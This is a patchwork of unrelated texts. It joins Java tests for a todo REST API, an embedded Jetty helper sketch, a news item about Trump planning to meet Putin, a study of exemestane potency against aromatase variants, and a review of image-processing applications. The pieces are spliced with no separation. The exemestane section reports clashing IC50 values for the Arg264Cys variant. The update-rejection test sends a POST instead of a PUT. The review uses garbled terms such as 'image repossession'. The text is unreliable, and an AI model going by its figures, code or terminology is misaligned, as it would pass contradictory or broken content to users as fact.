        return $(
            new TodoBuilder().withDescription("test").withDueDate(DateTime.now()).build()
        );
    }

    @Test
    @Parameters(method = "provideInvalidTodosForCreation")
    public void shouldRejectInvalidTodoWhenCreate(Todo todo) {
        Response response = createTarget().request().post(Entity.json(todo));

        assertThat(response.getStatus()).isEqualTo(BAD_REQUEST.getStatusCode());
    }

    private static Object[] provideInvalidTodosForCreation() {
        return $(
            new TodoBuilder().withDescription("test").build(),
            new TodoBuilder().withDueDate(DateTime.now()).build(),
            new TodoBuilder().withId(123L).build(),
            new TodoBuilder().build()
        );
    }

    @Test
    @Parameters(method = "provideValidTodosForModification")
    public void shouldUpdateTodo(Todo todo) {
        DateTime now = DateTime.now();

        Response response = createTarget().path(existingTodoId()).request().put(Entity.json(todo));

        assertThat(response.getStatus()).isEqualTo(OK.getStatusCode());
        Todo updatedTodo = response.readEntity(Todo.class);
        // Note: the original code called assertThat(...) without a matcher,
        // which asserts nothing; .isTrue() makes the check effective.
        assertThat(updatedTodo.getDueDate().isAfter(now)).isTrue();
    }

    private Object[] provideValidTodosForModification() {
        return $(
            new TodoBuilder().withDescription("test").withDueDate(DateTime.now()).build(),
            new TodoBuilder().withDescription("test").build(),
            new TodoBuilder().withDueDate(DateTime.now()).build()
        );
    }

    @Test
    @Parameters(method = "provideInvalidTodosForModification")
    public void shouldRejectInvalidTodoWhenUpdate(Todo todo) {
        Response response = createTarget().request().post(Entity.json(todo));

        assertThat(response.getStatus()).isEqualTo(BAD_REQUEST.getStatusCode());
    }

    private Object[] provideInvalidTodosForModification() {
        return $(
            new TodoBuilder().withId(123L).build(),
            new TodoBuilder().build()
        );
    }

    private WebTarget createTarget() {
        return client.target(embeddedJetty.getBaseUri()).path("todo");
    }

    private Client createClient() {
        JacksonJsonProvider jacksonJsonProvider = new JacksonJaxbJsonProvider();
        ObjectMapper objectMapper = new ObjectMapper();
        objectMapper.registerModule(new JodaModule());
        jacksonJsonProvider.setMapper(objectMapper);
        return ClientBuilder.newClient().register(jacksonJsonProvider);
    }

    private Todo createTodo() {
        Todo todo = new TodoBuilder()
            .withDescription("before")
            .withDueDate(DateTime.now().plusDays(30))
            .build();
        Response response = createTarget().request().post(Entity.json(todo));
        return response.readEntity(Todo.class);
    }

    private String existingTodoId() {
        return String.format("%d", existingTodo.getId());
    }

    @BeforeClass
    public static void beforeClass() throws Exception {
        embeddedJetty = new EmbeddedJetty();
        embeddedJetty.start();
    }

    @AfterClass
    public static void afterClass() throws Exception {
        embeddedJetty.stop();
    }
}
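The EmbeddedJetty helper used above is not part of this excerpt. A minimal sketch of what such a class could look like follows; the class layout, the Jersey resource package name, and the port handling are all assumptions, not the project's actual implementation.

package pl.pjagielski;

import java.net.URI;

import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.servlet.ServletContextHandler;
import org.eclipse.jetty.servlet.ServletHolder;
import org.glassfish.jersey.servlet.ServletContainer;

/**
 * Hypothetical sketch of the EmbeddedJetty helper referenced by the test:
 * boots a Jetty server on a random free port with a Jersey servlet.
 * The resource package name below is an assumption.
 */
public class EmbeddedJetty {

    private Server server;

    public void start() throws Exception {
        server = new Server(0); // port 0 = pick any free port
        ServletContextHandler context = new ServletContextHandler(ServletContextHandler.NO_SESSIONS);
        context.setContextPath("/");
        ServletHolder jersey = new ServletHolder(ServletContainer.class);
        jersey.setInitParameter("jersey.config.server.provider.packages", "pl.pjagielski");
        context.addServlet(jersey, "/*");
        server.setHandler(context);
        server.start();
    }

    public URI getBaseUri() {
        return server.getURI();
    }

    public void stop() throws Exception {
        server.stop();
    }
}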
President Trump said shortly before landing in Japan Sunday that he expects to meet with Russian President Vladimir Putin during his 12-day trip to Asia. Trump told a gaggle of reporters during his flight to Japan that the two are expecting to meet to discuss North Korea. “I think it’s expected we’ll meet with Putin, yeah. We want Putin’s help on North Korea, and we’ll be meeting with a lot of different leaders," Trump said. The comment comes after Trump suggested earlier this week that the two world leaders might meet. Asked Thursday by Fox News host Laura Ingraham on "The Ingraham Angle" whether he will speak with Putin on his trip, Trump said, "We may have a meeting with Putin. And, again — Putin is very important because they can help us with North Korea." Trump and Putin first met in July during the Group of 20 summit in Hamburg, Germany. The bilateral meeting reportedly lasted for more than two hours, rather than the 30 minutes it had been scheduled for. This second meeting would come just days after the first indictments were handed down against Trump campaign staffers in special counsel Robert Mueller's probe into Russian election interference.
Exemestane potency is unchanged by common nonsynonymous polymorphisms in CYP19A1: results of a novel antiaromatase activity assay examining exemestane and its derivatives Abstract Exemestane (EXE) treats estrogen receptor-positive (ER+) breast cancer in postmenopausal women by inhibiting the estrogen-synthesizing cytochrome P450 CYP19A1. Variability in the severity and incidence of side effects, as well as in overall drug efficacy, may be partially explained by genetic factors, including nonsynonymous variation in CYP19A1, also known as aromatase. The present study identified phase I EXE metabolites in human liver microsomes (HLM) and investigated mechanisms that may alter the extent of systemic estrogen deprivation in EXE-treated women with breast cancer, including whether functional polymorphisms in aromatase cause differential inhibition by EXE and whether EXE metabolites possess anti-aromatase activity. The potency of EXE and ten of its derivatives was measured with HEK293-overexpressed wild-type aromatase (CYP19A1*1) using a rapid novel UPLC tandem mass spectrometry method. Of the ten compounds assayed, five were poor inhibitors (IC50 > 50 μmol/L) of wild-type aromatase, while five others, including the major metabolite 17b-dihydroexemestane (17b-DHE), exhibited moderate potency, with IC50 values ranging between 1.2 and 7.1 μmol/L. The anti-aromatase activity of EXE was also tested with two common allozymes, aromatase Thr201Met (CYP19A1*3) and aromatase Arg264Cys (CYP19A1*4). Differential inhibition of variant aromatase is unlikely to account for variable clinical outcomes, as EXE-mediated inhibition of aromatase Thr201Met (IC50 = 0.86 ± 0.12 μmol/L) and aromatase Arg264Cys (IC50 = 1.7 ± 0.65 μmol/L) did not significantly differ from wild type (IC50 = 0.92 ± 0.17 μmol/L). Although these metabolites are less potent than the parent drug, the results suggest that active metabolites may contribute to the therapeutic mechanism of EXE. Introduction Exemestane is a synthetic androgen prescribed to postmenopausal women with ER+ breast cancer. As an adjuvant endocrine therapy, EXE irreversibly inhibits the aromatase-mediated production of estrogens from androgen precursors, a process known as aromatization. A previous pharmacokinetics study found that the maximum plasma concentration of EXE in postmenopausal women with a prior history of breast cancer ranged from 3.0 to 15.6 ng/mL following 2 weeks of oral dosing (25 mg/day), while the maximum amount of its 17b-DHE metabolite varied 7-fold, with reported values of 0.22-1.58 ng/mL. Prescriptive information states that EXE is extensively metabolized, in part by aldo-keto reductases (AKRs). A key phase I metabolic pathway of EXE is C17 reduction to form a hydroxyl moiety vulnerable to phase II conjugation and excretion. Recent studies independently confirmed that five purified hepatic cytosolic reductases, AKRs 1C1-4 and carbonyl reductase 1 (CBR1), reduce EXE to the active metabolite 17b-DHE. Formation of 17a-dihydroexemestane (17a-DHE), a novel metabolite with unknown anti-aromatase activity (AAA), was catalyzed by AKR1C4 and CBR1. A second metabolic pathway in human liver preparations is C6 exomethylene oxidation by CYP3A4 to form multiple secondary metabolites. The chemical structures of the C6-oxidized metabolites, as well as detailed information regarding their capacity to inhibit aromatase, are omitted from the product leaflet dispensed with EXE tablets.
Several studies imply that EXE hepatic metabolism may be more complex than previously believed, with possibly undiscovered metabolites and the involvement of additional cytochrome P450s (CYP450s). Comprehensively identifying phase I EXE metabolites is warranted because EXE derivatives may contribute to systemic estrogen blockade through aromatase inhibition. The presence of 17b-DHE as a major metabolite in human plasma has been unequivocally confirmed in studies of postmenopausal women taking EXE. However, past attempts to identify less-studied metabolites have been speculative due to the lack of standard reference compounds. Using GC-MS, three peaks likely corresponding to C6-oxidized metabolites were detected in the urine of healthy male volunteers (Cavalcanti). Another study found six metabolites, including 17b-DHE, in human urine following administration of radiolabeled EXE. However, both studies of urinary EXE metabolites were hampered by the lack of a comparison of physiochemical properties between the suspected metabolites and known standards. Six possible metabolite peaks were observed in human liver microsomes presented with EXE substrate. One peak was confirmed to be 17b-DHE and another was tentatively designated as 6-hydroxymethylandrosta-1,4,6-triene-3,17-dione (6-HME). The identities of the remaining four peaks could not be established. The current study addresses methodological issues that have historically undermined phase I EXE metabolite identification. First, a reference library of C6- and C17-modified EXE analogs was synthesized to confirm the identity of suspected metabolites observed in incubations of EXE with human liver microsomes. Secondly, a newly developed UPLC/MS/MS method eliminates the need for organic extraction to remove residual substrate prior to analysis, unlike previous scintillation-based studies of AAA (Thompson and Siiteri 1974). Instead, low levels of estrone formation are quantitated directly rather than extrapolated from tritiated water release during the aromatization of radiolabeled androstenedione. Interestingly, aromatase from human placental microsomes is used in traditional AAA screenings (Thompson and Siiteri 1974). CYP1A1 is well expressed in human placenta and extensively metabolized EXE in an in vitro assay using recombinant baculosome-expressed CYP450s (Uhl). Therefore, background phase I metabolism in human placental microsomes may complicate the analysis of AAA assays. However, expression analysis has shown that HEK293 cells are CYP450- and UDP-glucuronosyltransferase (UGT)-null (data not shown). To circumvent potential confounding from endogenous enzymes in placental preparations, aromatase-overexpressing HEK293 cells were created in the present study to evaluate the potency of EXE analogs in impeding estrogen biosynthesis. While it is well accepted that genetic differences may influence an individual's drug disposition for many pharmaceuticals, the extent to which polymorphisms in aromatase explain interindividual variation in EXE potency is unclear. Interestingly, aromatase has several common nonsynonymous variants that might contribute to variability in drug disposition by altering the enzyme's affinity for EXE, potentially affecting EXE efficacy or toxicity risk. Consequently, we also compared the efficacy of EXE in inhibiting two allozymes, aromatase Thr201Met and aromatase Arg264Cys, relative to the wild-type enzyme.
Reference library synthesis: EXE and ten C6-oxidized or C17-reduced EXE analogs were resuspended in ethanol and stored at −80°C following synthesis at Washington State University (Spokane, WA). Previous studies provide detailed descriptions of the synthesis, purification, and NMR-based identity verification of each compound (Vatèle 2007). Creation of aromatase-overexpressing HEK293: stable overexpression of wild-type aromatase in HEK293 was driven by a pcDNA3.1/V5-His-TOPO mammalian expression vector as previously described. Constitutive overexpression vectors encoding the common aromatase variants Thr201Met and Arg264Cys were produced via site-directed mutagenesis using the wild-type plasmid as template. Variant expression vectors were amplified in BL21 grown under ampicillin selection for 16 h at 37°C. Sanger sequencing was used to confirm successful mutagenesis. Lipofectamine 2000 was used to transfect HEK293 with the variant overexpression plasmids. Transfected HEK293 were grown in high-glucose DMEM containing 700 μg/mL G418, 10% FBS, and penicillin/streptomycin for at least 3 weeks. The cells were then harvested by resuspension in PBS, lysed via 4 freeze-thaw cycles, and centrifuged for 15 min at 13,200g at 4°C. Microsomes for each cell line were prepared from the supernatant through differential centrifugation (1 h, 34,000g) in a chilled Beckman L7-65 ultracentrifuge (Brea, CA), resuspended in PBS, and stored at −80°C. The relative expression of aromatase was quantitated in triplicate by subjecting 20 μg of protein from each overexpressing cell line to SDS-PAGE in a 10% tris-glycine polyacrylamide gel. Following transfer to PVDF for 90 min at 30 V, the membrane was blocked overnight at 4°C in 5% nonfat dry milk, washed for 30 min in 0.1% Tween, and probed overnight with anti-aromatase primary antibody (1:2500). The next day, the membrane was again washed for 30 min and probed with HRP-conjugated goat anti-rabbit antibody (1:7500) for 1 h at ambient temperature. Following another 30 min wash, the blot was incubated with SuperSignal West Femto Maximum Sensitivity Substrate per the manufacturer's instructions and imaged on a ChemiDoc Imager (Bio-Rad, Hercules, CA). ImageJ software (NIH, Bethesda, MD) was used to measure band density, while Ponceau staining was used to validate even loading between lanes. EXE metabolite identification: a 50-μL incubation containing 50 μg of HLM in PBS (pH 7.4), 400 μmol/L EXE, and an NADPH regeneration system was placed in a 37°C water bath for 4 h before termination with 50 μL of cold acetonitrile. After a 15-min refrigerated centrifugation at 13,200g, the supernatant was examined for phase I EXE metabolites. A 10-min UPLC method was used to separate and detect EXE and the ten other reference compounds through multiple-reaction monitoring with positive-mode electrospray ionization on a Waters ACQUITY UPLC/MS/MS system (Milford, MA). The 1.7 μm ACQUITY UPLC BEH C18 column (2.1 mm × 50 mm, Ireland) used for these analyses was protected by a 0.2 μm in-line filter. The UPLC gradient conditions used have previously been described. The fragmentation characteristics and retention times of suspected metabolite peaks were compared to compounds from the reference library.
Impact of nonsynonymous polymorphisms on EXE potency: IC50 values describing EXE-mediated aromatase inhibition did not significantly differ (P = 0.71) between the wild-type enzyme (0.92 ± 0.17 μmol/L), aromatase Thr201Met (0.86 ± 0.12 μmol/L), and aromatase Arg264Cys (0.97 ± 0.09 μmol/L) in AAA assays normalized for relative aromatase expression (Fig. 2). Many aromatase polymorphisms exist, but data regarding the functional significance of variant alleles for human health are inconsistent. The prevalence of the Thr201Met allele is estimated at 5% in Caucasians and African Americans, while the frequency of the Arg264Cys allele is 2.5% and 22.5% in Caucasians and African Americans, respectively. One study of variant aromatase found that enzyme activity strongly correlated with expression levels in transiently transfected COS-1 cells and further concluded that any differences from wild type in the overall activity of the Thr201Met and Arg264Cys allozymes are likely mediated by differential expression. EXE metabolite identification: 17b-DHE, 6-HME, 6a/b-hydroxy-6a/b-hydroxymethyl-androsta-1,4-diene-3,17-dione, and 6a/b,17b-dihydroxy-6a/b-hydroxymethyl-androsta-1,4-diene-3-one were identified in incubations of EXE with pooled human liver microsomes through comparison to reference compounds (Fig. 3). Although we found four EXE metabolites, an in vitro study of EXE metabolism by Kamdem et al. detected six peaks corresponding to putative metabolites. Our assay was not designed to identify phase II metabolites, suggesting that the two additional peaks observed in the previous study may correspond to conjugated metabolites, such as the 17b-DHE glucuronide produced by UGT2B17. Considering their low abundance and limited capacity to inhibit aromatase in our novel AAA assay, the three C6-oxidized metabolites detected are unlikely to contribute to the overall pharmacology of EXE in vivo. However, these results show that 17b-DHE is not only the predominant EXE metabolite formed in human liver microsomes but also capable of inhibiting aromatase with moderate potency, suggesting that it may make clinically relevant contributions to the overall response to EXE in women with ER+ breast cancer. Author contributions: participated in research design: Peterson and Lazarus. Conducted experiments: Peterson. Contributed new reagents or analytic tools: Xia, Chen, and Peterson. Performed data analysis: Peterson. Wrote or contributed to the writing of the manuscript: Peterson, Chen, Xia, and Lazarus.
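As a side note on the IC50 values quoted above: given a measured dose-response series, a quick first-pass IC50 estimate can be obtained by log-linear interpolation between the two concentrations that bracket 50% residual activity. The sketch below is illustrative only; the data points are invented, and this is not the curve-fitting procedure used in the paper.

/**
 * Illustrative IC50 estimation by log-linear interpolation between the two
 * inhibitor concentrations that bracket 50% residual activity. The example
 * data are invented; the paper's actual fitting method is not shown here.
 */
public class Ic50Interpolation {

    static double estimateIc50(double[] concUm, double[] pctActivity) {
        for (int i = 0; i < concUm.length - 1; i++) {
            if (pctActivity[i] >= 50.0 && pctActivity[i + 1] < 50.0) {
                // Interpolate on log10(concentration), linear in % activity.
                double x0 = Math.log10(concUm[i]);
                double x1 = Math.log10(concUm[i + 1]);
                double t = (pctActivity[i] - 50.0) / (pctActivity[i] - pctActivity[i + 1]);
                return Math.pow(10.0, x0 + t * (x1 - x0));
            }
        }
        throw new IllegalArgumentException("50% activity is not bracketed by the data");
    }

    public static void main(String[] args) {
        double[] conc = {0.1, 0.3, 1.0, 3.0, 10.0};   // umol/L, invented
        double[] act  = {92, 75, 52, 28, 10};          // % residual activity, invented
        System.out.printf("estimated IC50 = %.2f umol/L%n", estimateIc50(conc, act));
    }
}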
Studies on application of image processing in various fields: An overview Abstract Quality inspection and evaluation play a vital role in producing quality products in a shorter span. Computer-aided estimation of product quality in different fields of engineering is a constructive advancement. Image processing is one of the most promising areas applied to the quality inspection of products, where the challenging tasks lie in recognition of the object and feature extraction. This paper attempts to provide an overview of the application of image processing and its methodology, with a few algorithms that have been used in different fields of engineering, organized under three important phases: acquisition of images, selection of the region of interest, and identification of defects. The paper concentrates on applications in construction, fluid flow, thermal imaging, the medical industry, the fruit and vegetable industry, rock carvings, and other areas. Applying image processing in these fields leads to quality products through a qualitative process, reducing both inspection time and cost. Introduction Image processing techniques can be used to process images, 3D models, and printouts, and to obtain the required data from the images. Researchers use a broad range of basic image-interpretation procedures when adopting analog visual techniques. This type of image processing is restricted to the analyst's area of knowledge, so analysts may apply a blend of personal knowledge and data during processing. In digital image processing, computer-based algorithms are developed to perform the processing. Digital image processing offers advantages over analog image processing because of the huge number of algorithms available to operate on the input data, and problems that arise during processing, such as noise and signal distortion, can be minimized or removed in a preprocessing step (signal processing). Since the late 2000s, advancements in computer-aided digital image processing have made it the dominant form of image processing, being both the most versatile and the cheapest. Image processing has a strong relation to computer vision and computer graphics. The following steps describe the procedure for image processing: hallucination (identifying hidden objects), image restoration and sharpening (creating a sharpened image), image repossession (searching for the area of interest), measurement of pattern (calculating the color range of objects), and image acknowledgment (differentiating the region of interest). In this study, a review of digital image processing applied in various fields is given, with suitable algorithms. Image processing in different fields It can be noticed that substantial investment has gone into civil infrastructure over the past few decades. To assure the safety of civilians, priority has to be given to maintenance, and interventions should be defined to reduce both environmental impacts and costs; climatic changes, among other factors, lead to new maintenance strategies. To achieve quick and reliable diagnostics, focused solutions have to be developed to keep structures robust, and the developed solutions ought to be effective, reliable, and economical.
The availability of digital and optical equipment has gained importance in structural assessment. Currently, in the construction sector, Terrestrial Laser Scanning (TLS) is widely adopted to perform land surveys, structural damage monitoring, structural health assessment, and deformation and damage studies. By means of 3D images of structures, TLS accurately collects both qualitative and quantitative information. For characterization and monitoring, Terrestrial Photogrammetry (TP) has been widely adopted; photogrammetry allows cost-effective, high-resolution 3D structural imaging. It is not possible to characterize fluid flow patterns at high velocity directly. Image processing techniques are widely adopted to visualize and characterize complicated 3D fluid flow and to acquire clear images of the physical phenomena for further processing. The foremost interests for researchers in fluid flow are pattern formation and flow structures, analyzed through acquired images. Much study has been carried out on jet origination and propagation, hypersonic jet flows, flow structures and patterns, and morphological flow properties and their emission by means of image processing. Severe heat generation occurs due to friction during machining, during the generation of electricity, and during the flow of electricity. In building construction, too, heat loss occurs due to poor wall finishing, roof performance, and poor insulation. If the insulation provided is too weak, it loses its effectiveness and can lead to even worse damage to the structure and the interior of the building. For example, motors running continuously at the same load conditions should be inspected for changes in thermal properties, so that early detection may avoid catastrophic failure. The diagnosis of various human diseases can be completed through commonly available medical tests. Biomedical images are acquired from living beings and are used for clinical diagnostics, disease treatment, and continuous monitoring. Medical imaging can be applied to observe and study the function and behavior of internal organs without the need for surgery. Computed Tomography (CT), Magnetic Resonance Imaging (MRI), and X-ray inspection are a few commonly used imaging techniques in the contemporary medical field. Virtual reality and augmented reality are innovations applied to save and improve the quality of life. Several sensors can also be employed to study and monitor human health conditions such as blood pressure, body temperature, respiration, glucose level, and skin perspiration; in addition, molecular analysis using microscopic images can be used to recognize the symptoms of diseases. The study of strain developed in a specimen under different types of loading, such as tension, compression, shear, bending, and twisting, plays an important role in predicting the life of the specimen. Fluctuating stresses also cause major problems in components subjected to dynamic loads. The prediction of strain distribution and the evaluation of strain-localization behavior before failure of the components is the major area to be concentrated on. In this method, a random pattern is etched on the top layer of the sample in order to determine the spatial displacement of the pattern under different loading conditions using digital correlation calculation.
The deviation of electrochemically or laser-etched grid patterns on the sample is analyzed with computer-based algorithms. 3.1 Image processing in the construction industry Image processing can be seen as an automated system for health monitoring and for evaluating the damage occurring in concrete and structures due to natural calamities. This deals with the characterization of crack patterns and the measurement of strain fields under different loads. Automated characterization allows the entire crack length to be measured and compared over a period of time, eliminating human error and achieving high accuracy. The main drawback is the resolution of the image obtained, which plays a vital role in image acquisition. Algorithms have been developed to detect cracks on the surface of concrete structures from images acquired by an automated robot; a sketch of such a detection step is given after this section. The processes involved in image acquisition and image processing of concrete structures are shown as a flow chart in Figure 3. 3.2 Image processing in fluid flow applications The distinctive pattern of a supersonic jet propagating into a stationary gas at ambient temperature is shown in Figure 6. The pattern is obtained from a supersonic jet impacting an ambient material and accelerated past a bow-shaped obstacle, whereas the outflow decelerates in a Mach disk or jet shock. Image processing is carried out with the radiation obtained from a point x-ray backlighting source, which produces a point-projection shadow of the experimental setup on an x-ray film. This type of technique only yields jet-flow pattern images at short scale lengths. By using an electron beam, fluorescent images can be produced to characterize and analyze the propagation of hypersonic jets at long scales. Mach number, jet velocity, and jet-to-ambient density ratio were considered the main output parameters for studying the fluid flow pattern. To analyze these output parameters, an image-based algorithm, as shown in Figure 7, is adopted to indicate the curvature of the developed jet head. 3.3 Image processing in thermal applications A thermal imaging inspection of a refractory can even prevent catastrophic failure leading to loss of production and safety-related problems. Thermal images can also be used for classifying vehicle categories in night-time traffic. Thermal imaging cameras are most suitable in situations where conventional cameras or image scanners cannot be applied for lack of illumination. Due to advancements in thermal imaging, applications also extend to border surveillance and security (cooled and uncooled cameras), given their ability to detect sized targets in absolute darkness under extreme weather conditions. Applications of thermal imaging include the food industry, medicine, building diagnostics, tool-condition monitoring, solar panels, volcanology, and weather forecasting. Studying prototypes with thermal imaging cameras may help researchers and engineers examine and determine flaws in prototypes and parts, and infrared technology can be applied for better, longer-lasting parts. The flow chart given in Figure 9 depicts the thermal imaging procedure that is most commonly adopted. By applying the Kantorovich (S-K) algorithm, thermographic images were reconstructed and their resolution enhanced.
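To make the crack-detection step mentioned above concrete, the following is a minimal sketch (not the algorithm from any of the cited works) of a classic pipeline on a grayscale image: Sobel gradient magnitude followed by a fixed threshold to produce a binary crack map. The threshold value and the synthetic test image are illustrative assumptions.

/**
 * Minimal sketch of a classic edge-based crack-detection step:
 * Sobel gradient magnitude on a grayscale image, then a fixed threshold.
 * Illustrative only; not the pipeline of any cited work.
 */
public class CrackDetectionSketch {

    /** Returns a binary map where true marks a candidate crack pixel. */
    static boolean[][] detect(int[][] gray, int threshold) {
        int h = gray.length, w = gray[0].length;
        boolean[][] crack = new boolean[h][w];
        for (int y = 1; y < h - 1; y++) {
            for (int x = 1; x < w - 1; x++) {
                // Sobel kernels for horizontal (gx) and vertical (gy) gradients.
                int gx = -gray[y - 1][x - 1] + gray[y - 1][x + 1]
                       - 2 * gray[y][x - 1] + 2 * gray[y][x + 1]
                       - gray[y + 1][x - 1] + gray[y + 1][x + 1];
                int gy = -gray[y - 1][x - 1] - 2 * gray[y - 1][x] - gray[y - 1][x + 1]
                       + gray[y + 1][x - 1] + 2 * gray[y + 1][x] + gray[y + 1][x + 1];
                double magnitude = Math.sqrt((double) gx * gx + (double) gy * gy);
                crack[y][x] = magnitude > threshold;
            }
        }
        return crack;
    }

    public static void main(String[] args) {
        // Tiny synthetic "image": a dark diagonal crack on a bright background.
        int[][] gray = new int[16][16];
        for (int[] row : gray) java.util.Arrays.fill(row, 200);
        for (int i = 2; i < 14; i++) gray[i][i] = 40;

        boolean[][] crack = detect(gray, 150); // threshold is an assumption
        for (boolean[] row : crack) {
            StringBuilder sb = new StringBuilder();
            for (boolean c : row) sb.append(c ? '#' : '.');
            System.out.println(sb);
        }
    }
}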
3.4 Image processing in medical applications Brain MRI can be used to diagnose glioma, HIV-related lesions, and cancer metastasis, in the same way that mammograms are used to detect breast cancer and CT scans are employed to detect cardiovascular diseases. Skin disorders such as eczema, acne, melanoma, and mycosis can also be recognized in microscopic images. The RGB scale of the images is taken into consideration when analyzing the diseases. Different color shades, characterized using hue-saturation-value (HSV) and YCbCr color spaces, such as blackish, reddish, bluish, whitish, and grayish, are used to distinguish the region of interest. The contrast of the image can be adjusted more precisely by mapping the regions of interest (ROIs) with normalization of the gray-image intensity. The MR and MRI images obtained can be stretched within the gray-level region, and the noise in the images can be removed by normalizing the gray level and RGB values to the range 0 to 1, using a min-max normalization of the form
\[ g'_{i,j} = \frac{g_{i,j} - g_{\min}}{g_{\max} - g_{\min}} , \]
where \(g'_{i,j}\) and \(g_{i,j}\) are the new and original values of the gray level (and analogously for each RGB channel) at pixel \((i, j)\). This kind of processing can also be implemented in the medical field to study skin disorders by normalizing the average skin color to the gray intensity level, so that digitization errors are minimized. 3.5 Image processing in material processing From previous studies of image processing in medical applications, it is known that many algorithms exist for reconstructing 2D images into 3D models; similar relations are extended to material processing. The relationship between a local 2D image point \(p = (u, v)\) and a global 3D point \(P = (x, y, z)\), expressed in the camera coordinate system, can be represented by the standard pinhole projection
\[ s\, p = A\, [R \mid T]\, P , \]
where \(s\) is the scale parameter, \(p\) is the local coordinate point, \(A\) is the camera matrix, which includes the focal lengths \((f_u, f_v)\) and the midpoint of the image \((u_0, v_0)\), and \(P\) is the global coordinate point; the \(R\) and \(T\) matrices are the rotation and translation matrices, respectively. To pick up the region of interest, the developed algorithm displays the major- and minor-axis dimensions of the deformed grid ellipse. Using these dimensions, the developed strain can be calculated with the circle-grid relations (Fig. 10)
\[ e_{\text{major}} = \ln(a/d), \qquad e_{\text{minor}} = \ln(b/d), \]
where \(a\) and \(b\) denote the major and minor axes of the ellipse, respectively, and \(d\) denotes the original diameter of the circle grid; a short worked sketch of these computations follows this section. 3.6 Image processing in food industries Image processing is used for food safety and standards; moreover, it is a contemporary technique used to ensure consumer satisfaction in a range of food-related fields. It focuses mainly on the detection of adulteration and on ensuring unspoiled fruits, vegetables, and meat for customers. Image processing is even used to sort products and to check and evaluate food-producing tools, all ultimately aimed at quality in life-critical products, especially foods. Consider an orange fruit with infected regions of a different color, often brown (Figure 14(a)). By distinguishing these colors through image processing, the go/no-go status of the fruit can be decided. The pixels near the differently colored regions, or pixels that are a mixture of both colors (orange and brown), are identified, spotted, and bounded in a distinct color. This boundary marks the region to be detected, called the region of interest (ROI). As in all other applications, the food industry also follows image capturing, image segmentation, object measurement or feature extraction, and classification. This method is pervasive in maintaining good food quality.
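The following is a compact sketch of the two computations just described, min-max gray-level normalization and circle-grid strain from the measured ellipse axes; all numbers in the demo are illustrative assumptions.

/**
 * Sketch of two computations from the text: min-max normalization of a
 * gray-level image to [0, 1], and circle-grid major/minor (true) strain
 * from the measured ellipse axes. Demo values are illustrative assumptions.
 */
public class GridStrainSketch {

    /** Min-max normalization: maps each gray value into [0, 1]. */
    static double[][] normalize(int[][] gray) {
        int min = Integer.MAX_VALUE, max = Integer.MIN_VALUE;
        for (int[] row : gray)
            for (int v : row) { min = Math.min(min, v); max = Math.max(max, v); }
        double range = Math.max(1, max - min); // avoid division by zero on flat images
        double[][] out = new double[gray.length][gray[0].length];
        for (int i = 0; i < gray.length; i++)
            for (int j = 0; j < gray[0].length; j++)
                out[i][j] = (gray[i][j] - min) / range;
        return out;
    }

    /** True strains of a circle (diameter d) deformed into an ellipse (axes a, b). */
    static double[] circleGridStrain(double a, double b, double d) {
        return new double[]{Math.log(a / d), Math.log(b / d)};
    }

    public static void main(String[] args) {
        int[][] img = {{10, 40}, {90, 250}};          // invented gray values
        double[][] n = normalize(img);
        System.out.printf("normalized corner: %.3f%n", n[1][1]); // prints 1.000

        double[] e = circleGridStrain(2.6, 1.8, 2.0); // invented axes/diameter (mm)
        System.out.printf("major strain = %.3f, minor strain = %.3f%n", e[0], e[1]);
    }
}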
Fuzzy logic has also been considered for brightening the boundary. By adjusting the threshold value, the RGB image can be converted to grayscale (Figure 15). The conversion of RGB to grayscale or black-and-white serves to increase processing speed and reduce computational time, and color intensity then has no influence over the results. Conclusion Computer-aided image processing techniques are pervasive in every field and form a contemporary area of research. Several applications of image processing, in construction, fluid flow, medical treatment, material screening, and food processing, were studied in this review. Most of these applications adopt the same procedures: filtering the initial input image, segmentation and separation of the region of interest, feature extraction, and classification based on the required features. Although each area requires special treatment, there are a few common methods, such as edge detection, edge sharpening, noise detection and smoothing, and conversion to a grayscale image for identification. All of these are done by normalizing the RGB and gray values and adopting algorithms such as neural networks, fuzzy clustering, decision trees, and random forests. Ultimately, the potential for research in computer-aided image processing techniques is substantial, and the challenges to be solved, and yet to be found, in each field are boundless. The concepts and methodology for implementing these techniques are almost similar in all fields, which offers new researchers wide opportunities. It is evident that substantial innovation and research are in progress in and around computer-aided digital image processing, and this will lead the future unanimously.